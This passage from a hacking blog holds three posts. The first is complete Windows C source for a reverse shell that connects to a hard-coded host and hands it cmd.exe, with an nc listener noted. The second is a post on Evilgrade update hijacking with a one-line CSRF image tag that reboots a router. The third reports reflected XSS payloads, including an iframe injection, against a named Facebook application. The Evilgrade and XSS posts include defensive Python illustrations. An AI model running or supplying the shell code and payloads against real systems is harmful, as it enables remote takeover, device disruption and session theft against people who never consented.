
Monday, October 31, 2011

Reverse shell through DLL Injection using undocumented API function

/********************************************************
 * AJVrs.c
 * Reverse shell in win32
 * (c) by Andreas Venieris (aka thiseas) 2010
 * Compile with VS 2008 from command line with cl:
 *   C:> cl AJVrs.c
 ********************************************************/
#include <winsock2.h>
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#pragma comment(lib, "Ws2_32.lib") // Inform the linker that the Ws2_32.lib file is needed.

#define DEFAULT_PORT 1234
#define DEFAULT_IP   "192.168.1.70"

WSADATA wsaData;
SOCKET Winsocket;
STARTUPINFO theProcess;
PROCESS_INFORMATION info_proc;
struct sockaddr_in Winsocket_Structure;

int main(int argc, char *argv[])
{
    char IP[16] = DEFAULT_IP;       // writable buffer: strncpy() into a string literal is undefined behaviour
    unsigned short port = DEFAULT_PORT;
    char cmd[] = "cmd.exe";         // CreateProcess() may modify the command line, so keep it writable

    if (argc == 3) {
        strncpy(IP, argv[1], sizeof(IP) - 1);
        IP[sizeof(IP) - 1] = '\0';
        port = (unsigned short)atoi(argv[2]);
    }

    WSAStartup(MAKEWORD(2, 2), &wsaData);

    // WSASocket() with dwFlags == 0 creates a NON-overlapped socket. A socket from
    // socket() is overlapped and cannot be handed to cmd.exe as a standard handle.
    Winsocket = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0);
    if (Winsocket == INVALID_SOCKET) {
        WSACleanup();
        return 1;
    }

    Winsocket_Structure.sin_family = AF_INET;
    Winsocket_Structure.sin_port = htons(port);
    Winsocket_Structure.sin_addr.s_addr = inet_addr(IP);

    // Connect back to the listener (for example "nc -lvp 1234" on the attacker's host).
    if (WSAConnect(Winsocket, (SOCKADDR *)&Winsocket_Structure,
                   sizeof(Winsocket_Structure), NULL, NULL, NULL, NULL) == SOCKET_ERROR) {
        closesocket(Winsocket);
        WSACleanup();
        return 1;
    }

    // Starting the shell by creating a new process with i/o redirection.
    memset(&theProcess, 0, sizeof(theProcess));
    theProcess.cb = sizeof(theProcess);
    theProcess.dwFlags = STARTF_USESTDHANDLES;

    // here we make the redirection: stdin, stdout and stderr all point at the socket
    theProcess.hStdInput = theProcess.hStdOutput = theProcess.hStdError = (HANDLE)Winsocket;

    // fork the new process; bInheritHandles must be TRUE so cmd.exe inherits the socket handle.
    if (CreateProcess(NULL, cmd, NULL, NULL, TRUE, 0, NULL, NULL,
                      &theProcess, &info_proc) == 0) {
        closesocket(Winsocket);
        WSACleanup();
        return 1;
    }

    // The child keeps the socket open; the parent only drops its own handles and exits.
    CloseHandle(info_proc.hThread);
    CloseHandle(info_proc.hProcess);
    return 0;
}

Hijacking Software updates with Evilgrade

Nowadays software developers do not spend much time on updates and secure delivery mechanisms. That is
why the standard process for updating an application leaves many users vulnerable. The process is as follows:

• The application initiates the update process.

• The application asks DNS to resolve the update host, for example update.app1.com.

• The DNS server replies with the server's IP (for example 200.1.1.1).

• The application downloads a special file with information about the update, for example lastupdate.xml from update.app1.com.

• The application parses the update file and detects new updates.

• Finally App1 downloads and executes the update:
http://update.app1.com/update.exe

A lot of applications do not verify the update's contents and blindly trust the master update server. Nothing then prevents an attacker who can answer for that server (by spoofing the DNS reply or intercepting the plain HTTP traffic) from handing the application a file of his choosing to run on the system. Evilgrade is a modular framework that allows attackers to take advantage of poor update implementations by injecting fake updates.
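As an added illustration (not code from this post or from Evilgrade), the following Python sketches the update client described above in two forms: the one Evilgrade preys on, which runs whatever the answering server's manifest points at, and a hardened one that verifies a vendor signature over the manifest, pins the download to https on the expected host, and checks the downloaded file's SHA-256 against the signed manifest. The manifest layout, the sample file bytes, the fake_fetch stand-in for HTTP and the toy RSA key are all constructed for the example; a real client would use a proper signature library rather than textbook RSA with tiny primes.

```python
import hashlib
import xml.etree.ElementTree as ET
from urllib.parse import urlsplit

# Toy RSA key pair, CONSTRUCTED for this example. Real clients ship a vendor
# public key for a proper signature scheme (e.g. Ed25519 via PyNaCl); these
# primes are far too small and textbook RSA has no padding.
_P, _Q, _E = 2 ** 61 - 1, 2 ** 31 - 1, 65537
_N = _P * _Q
_D = pow(_E, -1, (_P - 1) * (_Q - 1))      # private exponent (Python >= 3.8)
VENDOR_PUBLIC_KEY = (_N, _E)               # compiled into the application
PINNED_UPDATE_HOST = "update.app1.com"      # host name taken from the post


def _digest_int(data: bytes, n: int) -> int:
    """SHA-256 of the manifest as an integer below the modulus."""
    return int.from_bytes(hashlib.sha256(data).digest(), "big") % n


def sign_manifest(manifest: bytes) -> int:
    """Vendor side, at release time: sign lastupdate.xml with the private key."""
    return pow(_digest_int(manifest, _N), _D, _N)


def verify_manifest(manifest: bytes, signature: int, pubkey=VENDOR_PUBLIC_KEY) -> bool:
    n, e = pubkey
    return pow(signature, e, n) == _digest_int(manifest, n)


class UpdateRejected(Exception):
    pass


def vulnerable_update(manifest: bytes, fetch) -> bytes:
    """The flow from the post: trust whatever update.app1.com (or whoever answers
    for it) says, download <url> and hand the bytes to the caller to execute."""
    url = ET.fromstring(manifest).findtext("url")
    return fetch(url)


def hardened_update(manifest: bytes, signature: int, fetch,
                    pubkey=VENDOR_PUBLIC_KEY) -> bytes:
    """Same flow with the three checks a spoofed server cannot pass."""
    if not verify_manifest(manifest, signature, pubkey):
        raise UpdateRejected("manifest signature does not verify")
    root = ET.fromstring(manifest)
    url = root.findtext("url") or ""
    parts = urlsplit(url)
    if parts.scheme != "https" or parts.hostname != PINNED_UPDATE_HOST:
        raise UpdateRejected("refusing to download update from %r" % url)
    payload = fetch(url)
    if hashlib.sha256(payload).hexdigest() != (root.findtext("sha256") or "").lower():
        raise UpdateRejected("downloaded file does not match the signed digest")
    return payload


def try_update(manifest, signature, fetch):
    """Run the hardened client; None means the update was rejected."""
    try:
        return hardened_update(manifest, signature, fetch)
    except UpdateRejected:
        return None


# --- constructed scenario ----------------------------------------------------
GENUINE_EXE = b"MZ genuine update.exe v2.0 (constructed bytes)"
MALICIOUS_EXE = b"MZ attacker payload served by the fake update server (constructed)"


def make_manifest(url: str, payload: bytes) -> bytes:
    return ("<update><version>2.0</version><url>%s</url><sha256>%s</sha256></update>"
            % (url, hashlib.sha256(payload).hexdigest())).encode()


GENUINE_MANIFEST = make_manifest("https://update.app1.com/update.exe", GENUINE_EXE)
GENUINE_SIG = sign_manifest(GENUINE_MANIFEST)
# What an Evilgrade-style attacker answers once it controls DNS/HTTP for
# update.app1.com: its own manifest; the only signature it has is the old
# genuine one, which it can replay but not adapt.
ATTACKER_MANIFEST = make_manifest("http://update.app1.com/update.exe", MALICIOUS_EXE)


def fake_fetch(url: str) -> bytes:
    """Stand-in for HTTP: plain http is hijacked, https still reaches the vendor."""
    return {"https://update.app1.com/update.exe": GENUINE_EXE,
            "http://update.app1.com/update.exe": MALICIOUS_EXE}[url]


def run_scenario():
    """Returns (what the vulnerable client executes, what the hardened one executes)."""
    return (vulnerable_update(ATTACKER_MANIFEST, fake_fetch),
            try_update(ATTACKER_MANIFEST, GENUINE_SIG, fake_fetch))


if __name__ == "__main__":
    blind, hardened = run_scenario()
    print("vulnerable client runs:", blind)
    print("hardened client runs:  ", hardened)
```

Run it directly to see the vulnerable client hand back the attacker's bytes while the hardened client rejects the same manifest. Two caveats the code does not cover: a validly signed but old manifest (one pointing at a version with a known hole) would still verify, so the client must also refuse versions older than the one installed; and TLS on its own is not a substitute for the signature, since the attacker Evilgrade models already sits between the application and the network.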

Google code mirror of Evilgrade

Enjoy...

to shut down router by using HTML code

It is a very simple trick: a single HTML tag on any page the victim visits makes his browser send the router's restart request for him. The browser fetches the img URL like any other resource (the zero size only hides it), so if the victim is on the same LAN and the router accepts the restart form from an already logged-in browser session, or without authentication at all, the router reboots. This is cross-site request forgery (CSRF) against the router's web interface; the address and the form parameters below belong to one particular router and have to match the target model. The code is here:

<img width=0 height=0
src="http://192.168.1.3/FormSub.cgi2&restart=0&RestartStart=1&Restart=Restart">

Enjoy...

Monday, October 3, 2011


Vulnerable Facebook Applications

Facebook has always been under the scanner because of its privacy issues. Since its release in 2004,
it has been targeted several times because of its security measures. Over the course of time Facebook
did learn from its mistakes and improved the security of how people share information on
the platform. But an area where it still doesn't have much control is the applications that are built
on the platform. Here is a statement from Facebook's privacy policy about third-party
applications: "we do not own or operate the applications or websites that use Facebook
Platform. That means that when you use those applications and websites you are making
your Facebook information available to someone other than Facebook."
This is where users should be careful. Applications running on Facebook cannot be trusted unless
you know who built them and how they handle your data; a well-known app builder is only a weak signal.
There are various malicious and vulnerable Facebook applications running on the platform which can
misuse the information that you share. Facebook has become the prime target of spammers and hackers
because of its heavy popularity, and because most users are unaware of such issues they keep on
clicking every application that shows up in their notifications. The main aim of this post is to make
users aware of the fact that not every application on Facebook can be trusted.
While performing some tests on the Facebook platform, I came across a vulnerable application that can
be attacked using cross-site scripting. The application can be found at this link:
http://apps.facebook.com/name_meaning/ . This application tells you the meaning of your name.


As you can see, the application has a text box where the user can enter his/her name to find out
the meaning. I first checked this application with a normal reflected XSS attack by entering a
small piece of JavaScript: <script>alert("HackingAlert")</script>
This injection didn't work. So I tried a second payload with a slightly more advanced injection
to bypass the filter mechanism. The next JavaScript that I tried was:
>"><script>alert("HackingAlert")</script>"
This time the attack succeeded and an alert message was generated, showing successful
execution of the script. That the second payload worked while the first did not suggests the name
is reflected inside a quoted attribute: the leading >"> closes that attribute and its tag, so the
rest of the payload lands in the page as markup instead of inert attribute text.


I further went on to check whether I could insert more dangerous tags. The next script that I crafted
contained an <iframe> tag, to check whether my iframe would be displayed in place of the application.
The attack succeeded again: instead of displaying the application in the iframe area, it
displayed my blog URL which I had inserted in my script.
Here is my crafted script:
>"><script>alert("HackingAlert")</script><iframe src="http://hackingalert.blogspot.com" width="400" height="400"></iframe>"

NOTE – You will have to switch to the http version of Facebook instead of https in order
to use any of its third-party applications.
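To make the difference between the first and second payloads concrete, here is an added Python example (not the application's code, whose source is not public). It assumes the application echoes the submitted name into a double-quoted value attribute of the text box; that assumption is consistent with the behaviour observed above but is not confirmed by the page. A small HTML tokenizer then reports which payloads end up as real script or iframe elements and which stay inert attribute text, for the raw reflection and for an attribute-encoded fix.

```python
import html
from html.parser import HTMLParser

# The three inputs from the post, exactly as typed into the name box.
PAYLOAD_1 = '<script>alert("HackingAlert")</script>'
PAYLOAD_2 = '>"><script>alert("HackingAlert")</script>"'
PAYLOAD_3 = ('>"><script>alert("HackingAlert")</script>'
             '<iframe src="http://hackingalert.blogspot.com" width="400" height="400"></iframe>"')

# ASSUMED server-side template: the submitted name is echoed back into the
# value attribute of the text box (the real application's markup is not public).
TEMPLATE = ('<form method="get"><input type="text" name="name" value="{name}">'
            '<input type="submit" value="Find meaning"></form>')


def render_vulnerable(name: str) -> str:
    """Reflects the name with no output encoding, as the post's results imply."""
    return TEMPLATE.format(name=name)


def render_safe(name: str) -> str:
    """Fix: HTML-encode for attribute context. quote=True turns the '"' that
    PAYLOAD_2 relies on into &quot;, so the attribute can never be closed early."""
    return TEMPLATE.format(name=html.escape(name, quote=True))


class _TagCollector(HTMLParser):
    """Records which start tags the tokenizer actually sees in the response."""

    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)


def start_tags(markup: str) -> list:
    parser = _TagCollector()
    parser.feed(markup)
    parser.close()
    return parser.tags


def active_content(markup: str) -> list:
    """Which script-bearing elements end up as real elements (not attribute text)."""
    return sorted(set(start_tags(markup)) & {"script", "iframe"})


if __name__ == "__main__":
    for label, payload in (("payload 1", PAYLOAD_1), ("payload 2", PAYLOAD_2),
                           ("payload 3", PAYLOAD_3)):
        print(label, "vulnerable:", active_content(render_vulnerable(payload)),
              "safe:", active_content(render_safe(payload)))
```

In the vulnerable rendering, payload 1 never leaves the attribute (its own double quote merely ends the value early and mangles the tag), while payload 2's leading >"> closes the value and the input tag, so everything after it is parsed as markup. The fix is not a blacklist of script tags; it is encoding every reflected value for the context it lands in.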





Now any attacker can display a malicious link in the iframe area and spread the URL. The attacker can
use this technique to steal cookies and perform session hijacking. One caveat: a canvas application is
loaded in an iframe from the developer's own server, so the injected script runs in the application's
origin, not facebook.com's. What it can reach is the session the application itself keeps (its cookies
and the Facebook data already handed to it), which is still enough to hijack the user's session with
that application.


Looking at this URL, any normal user would believe that it belongs to the Facebook application. In fact
it does belong to it, but it has been crafted to attack the user's information. This vulnerability can
easily be used to steal cookies of legitimate users and lead to the compromise of their accounts.
Hence it is highly recommended that you do not trust any Facebook application blindly. Recently
lots of spam and vulnerable apps have flooded the platform, and Facebook will not take any
responsibility for information that you share with third-party applications within the platform. So
think before you CLICK!!

 
